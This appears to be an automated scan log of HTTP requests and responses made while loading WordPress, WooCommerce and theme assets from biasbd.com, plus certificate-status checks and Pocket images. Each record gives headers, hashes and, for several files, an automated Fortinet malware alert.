IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with very long lines (30449)
Hash 46a868d47ad97532f60a1419dd340564
726581d97c75b3770c19eade6431ccd14998bed8
4b5980de529a061954353b1d5e52e98902de5cad7c9c167150bad1b67d40ef98
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/js_composer/assets/lib/bower/font-awesome/css/font-awesome.min.css?ver=5.5 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: text/css
last-modified: Tue, 25 Dec 2018 05:41:36 GMT
etag: "7793-5c21c310-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 6913
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=3.6.7
111.221.45.32200 OK 617 B URL HTTP/1.1 biasbd.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=3.6.7
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with very long lines (1472), with no line terminators
Hash 2fbb48d9527fa1e38e0bda684e03b478
f5489d09ca4aaaeaac0a601938059dd782043ef8
dc716cc91b204432d809768b298d044089c0ec796cebf4bbaf28a7f3704ea948
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=3.6.7 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: application/x-javascript
last-modified: Thu, 10 Mar 2022 19:31:30 GMT
etag: "5c0-622a5212-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 617
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=3.6.7
111.221.45.32200 OK 1.0 kB URL HTTP/1.1 biasbd.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=3.6.7
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with very long lines (2940), with no line terminators
Hash 39463ba25159d96f7ac01a34f6df86df
0e24012f7c10c1de4ed82a1e16dc0908e505cac7
c5e652e240d2ea0982ea9978a274e3416a574cc82f8a8d31806e64a9fbc92b1d
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=3.6.7 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: application/x-javascript
last-modified: Thu, 10 Mar 2022 19:31:30 GMT
etag: "b7c-622a5212-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 1040
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/themes/industrial/js/countto.js?ver=5.2.16
111.221.45.32200 OK 915 B URL HTTP/1.1 biasbd.com/wp-content/themes/industrial/js/countto.js?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with CRLF line terminators
Hash ec069ca5933f06f20307ef566ae76cc2
bb8ad86a394e5dad5af04050a3313cc3838072b5
7c32680bb0afa1ba5219d23cb46e73df4a41196c3dcaa4cd629dc61e31fb8ee4
GET /wp-content/themes/industrial/js/countto.js?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: application/x-javascript
last-modified: Mon, 07 Mar 2016 07:01:44 GMT
etag: "a15-56dd2758-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 915
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-includes/js/dist/vendor/moment.min.js?ver=2.22.2
111.221.45.32200 OK 17 kB URL HTTP/1.1 biasbd.com/wp-includes/js/dist/vendor/moment.min.js?ver=2.22.2
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with very long lines (51679), with no line terminators
Hash 1fbbbdae15d9c0ba5857b2791ce71a66
814338d39879435491748ebee1cb66674d2010fd
5b4e060984605187cc4b5f653a80c521ca9a74dd6e22249539456b7bf2c43327
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/js/dist/vendor/moment.min.js?ver=2.22.2 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: application/x-javascript
last-modified: Fri, 19 Oct 2018 04:06:46 GMT
etag: "c9df-5bc95856-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 16894
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/themes/industrial/js/pikaday.js?ver=5.2.16
111.221.45.32200 OK 8.3 kB URL HTTP/1.1 biasbd.com/wp-content/themes/industrial/js/pikaday.js?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type Unicode text, UTF-8 text, with CRLF line terminators
Hash b46267a95223fd7baa0aee1931cd6964
9a069968f3edd327183d2426d004e11259baa83b
440f15d6277e6dd3185f6db725cac4fac0bd602f61044d72490ce9ea5b7a0887
GET /wp-content/themes/industrial/js/pikaday.js?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: application/x-javascript
last-modified: Mon, 07 Mar 2016 07:01:44 GMT
etag: "90b5-56dd2758-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 8269
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
r3.o.lencr.org/
23.36.77.32200 OK 503 B IP 23.36.77.32:0
ASN #20940 Akamai International B.V.
Hash ff433c9569a3557d806b1480aeafece9
20bbd46383b85326837f45290ff87df708b3b310
e8e5212b8d90257f23bdb0d1d643b5e7d7528d964056c3a4a269b5e09f409f2d
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "E8E5212B8D90257F23BDB0D1D643B5E7D7528D964056C3A4A269B5E09F409F2D"
Last-Modified: Sun, 02 Oct 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=19529
Expires: Tue, 04 Oct 2022 13:49:26 GMT
Date: Tue, 04 Oct 2022 08:23:57 GMT
Connection: keep-alive
r3.o.lencr.org/
23.36.77.32200 OK 503 B IP 23.36.77.32:0
ASN #20940 Akamai International B.V.
Hash ff433c9569a3557d806b1480aeafece9
20bbd46383b85326837f45290ff87df708b3b310
e8e5212b8d90257f23bdb0d1d643b5e7d7528d964056c3a4a269b5e09f409f2d
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "E8E5212B8D90257F23BDB0D1D643B5E7D7528D964056C3A4A269B5E09F409F2D"
Last-Modified: Sun, 02 Oct 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=19529
Expires: Tue, 04 Oct 2022 13:49:26 GMT
Date: Tue, 04 Oct 2022 08:23:57 GMT
Connection: keep-alive
r3.o.lencr.org/
23.36.77.32200 OK 503 B IP 23.36.77.32:0
ASN #20940 Akamai International B.V.
Hash ff433c9569a3557d806b1480aeafece9
20bbd46383b85326837f45290ff87df708b3b310
e8e5212b8d90257f23bdb0d1d643b5e7d7528d964056c3a4a269b5e09f409f2d
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "E8E5212B8D90257F23BDB0D1D643B5E7D7528D964056C3A4A269B5E09F409F2D"
Last-Modified: Sun, 02 Oct 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=19529
Expires: Tue, 04 Oct 2022 13:49:26 GMT
Date: Tue, 04 Oct 2022 08:23:57 GMT
Connection: keep-alive
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F8287b853-235b-49f5-9b5c-780827ac695b.jpeg
34.120.237.76200 OK 9.9 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F8287b853-235b-49f5-9b5c-780827ac695b.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 7b7345414898d451d930431b46d4bd00
a36475a0ec7d7b92593cadd4aa99ca38550f1cd1
79b541c69c78df0e4a4c26438431fd6b52754b589d80e929a4203063712a540c
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F8287b853-235b-49f5-9b5c-780827ac695b.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 9855
x-amzn-requestid: 15f15a2e-0028-40ac-be8f-8e20c37fd27e
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZcpHuGX7oAMFgDA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-633b5564-5fe693f30c91e4c82c8accb1;Sampled=0
x-amzn-remapped-date: Mon, 03 Oct 2022 21:34:28 GMT
x-amz-cf-pop: SFO5-P2, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: ngoNHOX6fFTGa1Y_-yFOFUYYYqiLJCQOq3NISbmc3gX21YO0TLxx0w==
via: 1.1 b637bd7696854d7acbf96132dcf53200.cloudfront.net (CloudFront), 1.1 707e733794d52100fde0ab21bf0b1462.cloudfront.net (CloudFront), 1.1 google
date: Mon, 03 Oct 2022 23:37:00 GMT
etag: "a36475a0ec7d7b92593cadd4aa99ca38550f1cd1"
content-type: image/jpeg
age: 31617
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
r3.o.lencr.org/
23.36.77.32200 OK 503 B IP 23.36.77.32:0
ASN #20940 Akamai International B.V.
Hash ff433c9569a3557d806b1480aeafece9
20bbd46383b85326837f45290ff87df708b3b310
e8e5212b8d90257f23bdb0d1d643b5e7d7528d964056c3a4a269b5e09f409f2d
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "E8E5212B8D90257F23BDB0D1D643B5E7D7528D964056C3A4A269B5E09F409F2D"
Last-Modified: Sun, 02 Oct 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=19529
Expires: Tue, 04 Oct 2022 13:49:26 GMT
Date: Tue, 04 Oct 2022 08:23:57 GMT
Connection: keep-alive
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F545190f2-96f3-40f8-bd46-cebe7171aee7.webp
34.120.237.76200 OK 9.9 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F545190f2-96f3-40f8-bd46-cebe7171aee7.webp
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash d8c08f8066cc732de8befd6ccd629a95
22aab05208a01ae5def4d63dc145085630f57bcb
f8a560a0563518d992d0bd2655d2b5c406435a18e874ca00b51374d2ff901770
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F545190f2-96f3-40f8-bd46-cebe7171aee7.webp HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 9917
x-amzn-requestid: 2dff93d9-795d-4885-9b82-610b0d235a82
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZcpvTGEnIAMF1zg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-633b5661-117afa703663ada75627792c;Sampled=0
x-amzn-remapped-date: Mon, 03 Oct 2022 21:38:41 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: p5nOqBojKO6S-c_DxIu8B3p-NK0pzRHkz0DOPeyv7PQt9h0x1jdtoQ==
via: 1.1 da5952aa802df39905ceb16592e9698a.cloudfront.net (CloudFront), 1.1 1508efc4152aa1778ed4adecb328b374.cloudfront.net (CloudFront), 1.1 google
date: Mon, 03 Oct 2022 21:55:54 GMT
age: 37683
etag: "22aab05208a01ae5def4d63dc145085630f57bcb"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F180dee10-1cde-4fbe-8a74-62b7b3bdb1e2.jpeg
34.120.237.76200 OK 6.3 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F180dee10-1cde-4fbe-8a74-62b7b3bdb1e2.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 206fb65e75dbadf119512f71e0b78402
58ff0bf8ce7528b303d28bab01a80ad721705569
56c8d5f3b3060ee54bf81995269b86c070855d8c33bf437161339a45b309703f
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F180dee10-1cde-4fbe-8a74-62b7b3bdb1e2.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 6315
x-amzn-requestid: 6aa75b16-32e4-48a7-9fb0-9e3d5528c2d5
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZWSdsHUnIAMFXtw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6338cabd-742d8a436403683e0cd9368f;Sampled=0
x-amzn-remapped-date: Sat, 01 Oct 2022 23:18:21 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: 5sAzc5Ewv4g6Wqq6JJiLylG3Jyy_nlWrr5Oteeo6ebEgq7Rvss4XaQ==
via: 1.1 f13aef0c4b52f6f681401f232d03eb68.cloudfront.net (CloudFront), 1.1 09331f0822fc98eebaf04130a83dbd44.cloudfront.net (CloudFront), 1.1 google
date: Tue, 04 Oct 2022 04:42:53 GMT
age: 13264
etag: "58ff0bf8ce7528b303d28bab01a80ad721705569"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Ff4f5077e-59b1-4f52-bd32-a57c373ce2f1.jpeg
34.120.237.76200 OK 8.3 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Ff4f5077e-59b1-4f52-bd32-a57c373ce2f1.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 59c6121e6f6cb833939e12585aca131e
5cc38c9cfe6a2ade7a1d8ee272c4eda47c35f5df
88b8a458ad437bf40d154b21d844ba56530ae05c2f42b417cfb0e6cffcb294e5
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Ff4f5077e-59b1-4f52-bd32-a57c373ce2f1.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 8308
x-amzn-requestid: 35cc0acc-ac90-4f36-a976-c61c34cfe4fe
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZcqNXG3mIAMFujg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-633b5722-112061742493dd5255c3fb00;Sampled=0
x-amzn-remapped-date: Mon, 03 Oct 2022 21:41:54 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: VeeA3FQIKbAt5xmPr99k9gQjGbbwrRLM1lFYWaVIO3TCVM19GUKJaA==
via: 1.1 0005a84c2971ff4f5bbb79e7ebc622a8.cloudfront.net (CloudFront), 1.1 01147dcc35d57fc0238a3c1700c13f16.cloudfront.net (CloudFront), 1.1 google
date: Mon, 03 Oct 2022 21:57:01 GMT
age: 37616
etag: "5cc38c9cfe6a2ade7a1d8ee272c4eda47c35f5df"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F8641c47a-9aff-4f73-bb07-6770cbbcc8d6.jpeg
34.120.237.76200 OK 5.5 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F8641c47a-9aff-4f73-bb07-6770cbbcc8d6.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 6c6882c60d7ca6f918c77104e3ad1d52
20ef861be49c652a938e0145e4ca3a60159367e2
861f5870990fbd2939d151ae18384cf311e87067ca9a50818efe0c2d51b83088
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F8641c47a-9aff-4f73-bb07-6770cbbcc8d6.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 5504
x-amzn-requestid: 37405eb0-5c75-46a9-84c0-e8ed726995d8
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZcpHvHPvoAMF3mg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-633b5564-77fd550b58af612525e74761;Sampled=0
x-amzn-remapped-date: Mon, 03 Oct 2022 21:34:28 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: Ovm2wuk28PygH4EZNEUoPchoHQggWCyXbYHOjMV1tZmfyDrL6PjPZA==
via: 1.1 01c28b52813cd0e82f810c492808b142.cloudfront.net (CloudFront), 1.1 5fe5f2a3903f1378941d92eceaf3fa16.cloudfront.net (CloudFront), 1.1 google
date: Mon, 03 Oct 2022 22:29:19 GMT
age: 35678
etag: "20ef861be49c652a938e0145e4ca3a60159367e2"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F9a61745f-0c9b-404a-ba22-0a69cf2f0383.jpeg
34.120.237.76200 OK 4.9 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F9a61745f-0c9b-404a-ba22-0a69cf2f0383.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 6779181f9c06975f2a662da743893939
585e7146fd24cdc2496b05baafea04091dc541e2
8e9a9f92fd89b7cdce77884ccd76b83ab82d28f125ebfc1cb0d371d4046b7985
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F9a61745f-0c9b-404a-ba22-0a69cf2f0383.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 4858
x-amzn-requestid: fb21c414-2994-444a-a838-e643fd05b171
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZcpvTEfPoAMFfeQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-633b5661-593dd8043b0490e7301cac0d;Sampled=0
x-amzn-remapped-date: Mon, 03 Oct 2022 21:38:41 GMT
x-amz-cf-pop: SFO5-P2, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: MiSh_FjAciKCaOakY2mM_EHBN1Z6GIDYIP8mwS4ikkrToQN3Ktsv2g==
via: 1.1 773ca14e6bd4bf9244988cb69fc9dca8.cloudfront.net (CloudFront), 1.1 b36bf2c460ac693ce304817aed073112.cloudfront.net (CloudFront), 1.1 google
date: Mon, 03 Oct 2022 21:56:46 GMT
age: 37631
etag: "585e7146fd24cdc2496b05baafea04091dc541e2"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 471 B IP 142.250.74.3:0
Hash 0ac04f7c449093fff4f846a7ae56cd4f
50aeb5664545a0dec4173920a274e906bcbcdf6f
18eff2566317aba7b70ee558e8cba42231eb4eae31e903501dc122c751d6993b
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
